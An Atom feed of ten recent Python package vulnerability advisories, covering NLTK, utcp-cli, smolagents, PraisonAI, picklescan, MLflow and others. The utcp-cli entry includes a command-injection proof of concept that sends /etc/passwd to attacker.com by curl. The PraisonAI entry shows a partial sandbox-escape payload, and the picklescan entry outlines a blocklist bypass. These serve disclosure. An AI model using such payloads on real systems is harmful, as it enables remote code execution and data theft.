<?xml version='1.0' encoding='UTF-8'?>
<?xml-stylesheet href="/static/style.xsl" type="text/xsl"?>
<feed xmlns="http://www.w3.org/2005/Atom" xml:lang="en">
  <id>https://cve.radiocsirt.org/rss/recent/pysec/10</id>
  <title>Most recent entries from pysec</title>
  <updated>2026-10-02T13:35:16.299112+00:00</updated>
  <author>
    <name>Vulnerability-Lookup</name>
    <email>csirt@opendfir.org</email>
  </author>
  <link href="https://cve.radiocsirt.org" rel="alternate"/>
  <generator uri="https://lkiesow.github.io/python-feedgen" version="1.0.0">python-feedgen</generator>
  <subtitle>Contains only the most 10 recent entries.</subtitle>
  <entry>
    <id>https://cve.radiocsirt.org/vuln/pysec-2026-99</id>
    <title>PYSEC-2026-99</title>
    <updated>2026-05-20T09:19:09.284207+00:00</updated>
    <content type="xhtml">
      <div xmlns="http://www.w3.org/1999/xhtml"><p><strong>Affected:</strong> PyPI: nltk</p>
<p>NLTK versions &lt;=3.9.2 are vulnerable to arbitrary code execution due to improper input validation in the StanfordSegmenter module. The module dynamically loads external Java .jar files without verification or sandboxing. An attacker can supply or replace the JAR file, enabling the execution of arbitrary Java bytecode at import time. This vulnerability can be exploited through methods such as model poisoning, MITM attacks, or dependency poisoning, leading to remote code execution. The issue arises from the direct execution of the JAR file via subprocess with unvalidated classpath input, allowing malicious classes to execute when loaded by the JVM.</p></div>
    </content>
    <link href="https://cve.radiocsirt.org/vuln/pysec-2026-99"/>
    <published>2026-03-05T21:16:14.263000+00:00</published>
  </entry>
  <entry>
    <id>https://cve.radiocsirt.org/vuln/pysec-2026-96</id>
    <title>PYSEC-2026-96</title>
    <updated>2026-05-20T09:19:09.128608+00:00</updated>
    <content type="xhtml">
      <div xmlns="http://www.w3.org/1999/xhtml"><p><strong>Affected:</strong> PyPI: nltk</p>
<p>A critical vulnerability exists in the NLTK downloader component of nltk/nltk, affecting all versions. The _unzip_iter function in nltk/downloader.py uses zipfile.extractall() without performing path validation or security checks. This allows attackers to craft malicious zip packages that, when downloaded and extracted by NLTK, can execute arbitrary code. The vulnerability arises because NLTK assumes all downloaded packages are trusted and extracts them without validation. If a malicious package contains Python files, such as __init__.py, these files are executed automatically upon import, leading to remote code execution. This issue can result in full system compromise, including file system access, network access, and potential persistence mechanisms.</p></div>
    </content>
    <link href="https://cve.radiocsirt.org/vuln/pysec-2026-96"/>
    <published>2026-02-18T18:24:19.410000+00:00</published>
  </entry>
  <entry>
    <id>https://cve.radiocsirt.org/vuln/pysec-2026-560</id>
    <title>PYSEC-2026-560 — utcp-cli Vulnerable to Command Injection via Unsanitized Argument Substitution in CLI Communication Protocol</title>
    <updated>2026-07-01T20:23:10.958711+00:00</updated>
    <content type="xhtml">
      <div xmlns="http://www.w3.org/1999/xhtml"><p><strong>Affected:</strong> PyPI: utcp-cli</p>
<p>## Summary</p>
<p>The `_substitute_utcp_args` method in `cli_communication_protocol.py` inserts user-controlled `tool_args` values directly into shell command strings without any sanitization or escaping. These commands are then executed via `/bin/bash -c` (Unix) or `powershell.exe -Command` (Windows), allowing an attacker to inject arbitrary shell commands.</p>
<p>## Affected File</p>
<p>`plugins/communication_protocols/cli/src/utcp_cli/cli_communication_protocol.py`
 
## Vulnerable Code</p>
<p>```python
def replace_placeholder(match):
    arg_name = match.group(1)
    if arg_name in tool_args:
        return str(tool_args[arg_name])  # No escaping applied
```</p>
<p>The substituted command is then embedded directly into a shell script:</p>
<p>```python
script_lines.append(f'{var_name}=$({substituted_command} 2&gt;&amp;1)')
```</p>
<p>And executed via:</p>
<p>```python
shell_cmd = ['/bin/bash', '-c', script]
```</p>
<p>## Proof of Concept</p>
<p>Given a tool defined as:
```json
{"command": "python script.py --input UTCP_ARG_filename_UTCP_END"}
```</p>
<p>Calling with:
 ```python
tool_args = {"filename": "data.csv; curl http://attacker.com/$(cat /etc/passwd | base64)"}
```</p>
<p>Produces and executes:
```bash
CMD_0_OUTPUT=$(python script.py --input data.csv; curl http://attacker.com/$(cat /etc/passwd | base64) 2&gt;&amp;1)
```</p>
<p>This results in full Remote Code Execution on the host system.</p>
<p>## Patched</p>
<p>Fixed in `utcp-cli` 1.1.2. `_substitute_utcp_args` now shell-quotes every substituted value: `shlex.quote` on Unix, a PowerShell single-quoted literal on Win…</p></div>
    </content>
    <link href="https://cve.radiocsirt.org/vuln/pysec-2026-560"/>
    <published>2026-06-29T11:50:49.296555+00:00</published>
  </entry>
  <entry>
    <id>https://cve.radiocsirt.org/vuln/pysec-2026-551</id>
    <title>PYSEC-2026-551 — terminal-controller-mcp vulnerable to Command Injection</title>
    <updated>2026-07-01T20:23:10.079817+00:00</updated>
    <content type="xhtml">
      <div xmlns="http://www.w3.org/1999/xhtml"><p><strong>Affected:</strong> PyPI: terminal-controller</p>
<p>A command injection vulnerability in the execute_command function of terminal-controller-mcp 0.1.7 allows attackers to execute arbitrary commands via a crafted input.</p></div>
    </content>
    <link href="https://cve.radiocsirt.org/vuln/pysec-2026-551"/>
    <published>2026-06-29T11:50:51.891261+00:00</published>
  </entry>
  <entry>
    <id>https://cve.radiocsirt.org/vuln/pysec-2026-543</id>
    <title>PYSEC-2026-543 — Hugging Face smolagents: Unsafe deserialization in Remote Python Executor leads to RCE</title>
    <updated>2026-07-01T20:23:05.184038+00:00</updated>
    <content type="xhtml">
      <div xmlns="http://www.w3.org/1999/xhtml"><p><strong>Affected:</strong> PyPI: smolagents</p>
<p>Hugging Face smolagents Remote Python Executor Deserialization of Untrusted Data Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of Hugging Face smolagents. Authentication is not required to exploit this vulnerability.</p>
<p>The specific flaw exists within the parsing of pickle data. The issue results from the lack of proper validation of user-supplied data, which can result in deserialization of untrusted data. An attacker can leverage this vulnerability to execute code in the context of the service account. Was ZDI-CAN-28312.</p></div>
    </content>
    <link href="https://cve.radiocsirt.org/vuln/pysec-2026-543"/>
    <published>2026-06-29T11:50:38.792590+00:00</published>
  </entry>
  <entry>
    <id>https://cve.radiocsirt.org/vuln/pysec-2026-512</id>
    <title>PYSEC-2026-512 — Radicale is vulnerable to directory traversal on Windows Filesystem Storage Backend component</title>
    <updated>2026-07-01T20:23:03.510449+00:00</updated>
    <content type="xhtml">
      <div xmlns="http://www.w3.org/1999/xhtml"><p><strong>Affected:</strong> PyPI: radicale</p>
<p>The filesystem storage backend in Radicale before 1.1 on Windows allows remote attackers to read or write to arbitrary files via a crafted path, as demonstrated by /c:/file/ignore.</p></div>
    </content>
    <link href="https://cve.radiocsirt.org/vuln/pysec-2026-512"/>
    <published>2026-06-29T11:50:32.382591+00:00</published>
  </entry>
  <entry>
    <id>https://cve.radiocsirt.org/vuln/pysec-2026-484</id>
    <title>PYSEC-2026-484 — PraisonAI: Python Sandbox Escape via str Subclass startswith() Override in execute_code</title>
    <updated>2026-07-01T20:23:01.886289+00:00</updated>
    <content type="xhtml">
      <div xmlns="http://www.w3.org/1999/xhtml"><p><strong>Affected:</strong> PyPI: praisonaiagents</p>
<p>### Summary</p>
<p>`execute_code()` in `praisonai-agents` runs attacker-controlled Python inside a three-layer sandbox that can be fully bypassed by passing a `str` subclass with an overridden `startswith()` method to the `_safe_getattr` wrapper, achieving arbitrary OS command execution on the host.</p>
<p>### Details</p>
<p>`python_tools.py:20` (source) -&gt; `python_tools.py:22` (guard bypass) -&gt; `python_tools.py:161` (sink)
 ```python
# source -- _safe_getattr accepts any str subclass
def _safe_getattr(obj, name, *default):
    if isinstance(name, str) and name.startswith('_'):  # isinstance passes for subclasses
        raise AttributeError(...)</p>
<p># hop -- type() is whitelisted in safe_builtins, creates str subclass without class keyword
FakeStr = type('FakeStr', (str,), {'startswith': lambda self, *a: False})</p>
<p># sink -- Popen reached via __subclasses__ walk
r = Popen(['id'], stdout=PIPE, stderr=PIPE)
```</p>
<p>### PoC
```python</p>
<p>from praisonaiagents.tools.python_tools import execute_code</p>
<p>payload = """
 t = type
FakeStr = t('FakeStr', (str,), {'startswith': lambda self, *a: False})</p>
<p>mro_attr  = FakeStr(''.join(['_','_','m','r','o','_','_']))
subs_attr = FakeStr(''.join(['_','_','s','u','b','c','l','a','s','s','e','s','_','_']))
mod_attr  = FakeStr(''.join(['_','_','m','o','d','u','l','e','_','_']))
name_attr = FakeStr(''.join(['_','_','n','a','m','e','_','_']))
PIPE = -1</p>
<p>obj_class = getattr(type(()), mro_attr)[1]
for cls in getattr(obj_class, subs_attr)():
    try:
        m = getattr(cls, mod_…</p></div>
    </content>
    <link href="https://cve.radiocsirt.org/vuln/pysec-2026-484"/>
    <published>2026-06-29T11:50:48.390200+00:00</published>
  </entry>
  <entry>
    <id>https://cve.radiocsirt.org/vuln/pysec-2026-456</id>
    <title>PYSEC-2026-456 — PickleScan's pkgutil.resolve_name has a universal blocklist bypass</title>
    <updated>2026-07-01T20:23:00.003107+00:00</updated>
    <content type="xhtml">
      <div xmlns="http://www.w3.org/1999/xhtml"><p><strong>Affected:</strong> PyPI: picklescan</p>
<p>## Summary</p>
<p>`pkgutil.resolve_name()` is a Python stdlib function that resolves any `"module:attribute"` string to the corresponding Python object at runtime. By using `pkgutil.resolve_name` as the first REDUCE call in a pickle, an attacker can obtain a reference to ANY blocked function (e.g., `os.system`, `builtins.exec`, `subprocess.call`) without that function appearing in the pickle's opcodes. picklescan only sees `pkgutil.resolve_name` (which is not blocked) and misses the actual dangerous function entirely.</p>
<p>This defeats picklescan's **entire blocklist concept** — every single entry in `_unsafe_globals` can be bypassed.</p>
<p>## Severity</p>
<p>**Critical** (CVSS 10.0) — Universal bypass of all blocklist entries. Any blocked function can be invoked.</p>
<p>## Affected Versions</p>
<p>- picklescan &lt;= 1.0.3 (all versions including latest)</p>
<p>## Details</p>
<p>### How It Works</p>
<p>A pickle file uses two chained REDUCE calls:</p>
<p>```
1. STACK_GLOBAL: push pkgutil.resolve_name
2. REDUCE: call resolve_name("os:system") → returns os.system function object
3. REDUCE: call the returned function("malicious command") → RCE
```</p>
<p>picklescan's opcode scanner sees:
- `STACK_GLOBAL` with module=`pkgutil`, name=`resolve_name` → **NOT in blocklist** → CLEAN
- The second `REDUCE` operates on a stack value (the return of the first call), not on a global import → **invisible to scanner**</p>
<p>The string `"os:system"` is just data (a SHORT_BINUNICODE argument to the first REDUCE) — picklescan does not analyze REDUCE arguments, only…</p></div>
    </content>
    <link href="https://cve.radiocsirt.org/vuln/pysec-2026-456"/>
    <published>2026-06-29T11:50:44.845189+00:00</published>
  </entry>
  <entry>
    <id>https://cve.radiocsirt.org/vuln/pysec-2026-423</id>
    <title>PYSEC-2026-423 — MLflow Command Injection vulnerability</title>
    <updated>2026-07-01T20:22:58.350388+00:00</updated>
    <content type="xhtml">
      <div xmlns="http://www.w3.org/1999/xhtml"><p><strong>Affected:</strong> PyPI: mlflow</p>
<p>A command injection vulnerability exists in MLflow's model serving container initialization code, specifically in the `_install_model_dependencies_to_env()` function. When deploying a model with `env_manager=LOCAL`, MLflow reads dependency specifications from the model artifact's `python_env.yaml` file and directly interpolates them into a shell command without sanitization. This allows an attacker to supply a malicious model artifact and achieve arbitrary command execution on systems that deploy the model. The vulnerability affects versions 3.8.0 and is fixed in version 3.8.1.</p></div>
    </content>
    <link href="https://cve.radiocsirt.org/vuln/pysec-2026-423"/>
    <published>2026-06-29T11:50:45.390530+00:00</published>
  </entry>
  <entry>
    <id>https://cve.radiocsirt.org/vuln/pysec-2026-420</id>
    <title>PYSEC-2026-420 — MLflow allowed arbitrary files to be PUT onto the server</title>
    <updated>2026-07-01T20:22:58.313071+00:00</updated>
    <content type="xhtml">
      <div xmlns="http://www.w3.org/1999/xhtml"><p><strong>Affected:</strong> PyPI: mlflow</p>
<p>MLflow allowed arbitrary files to be PUT onto the server.</p></div>
    </content>
    <link href="https://cve.radiocsirt.org/vuln/pysec-2026-420"/>
    <published>2026-06-29T11:50:43.209628+00:00</published>
  </entry>
</feed>
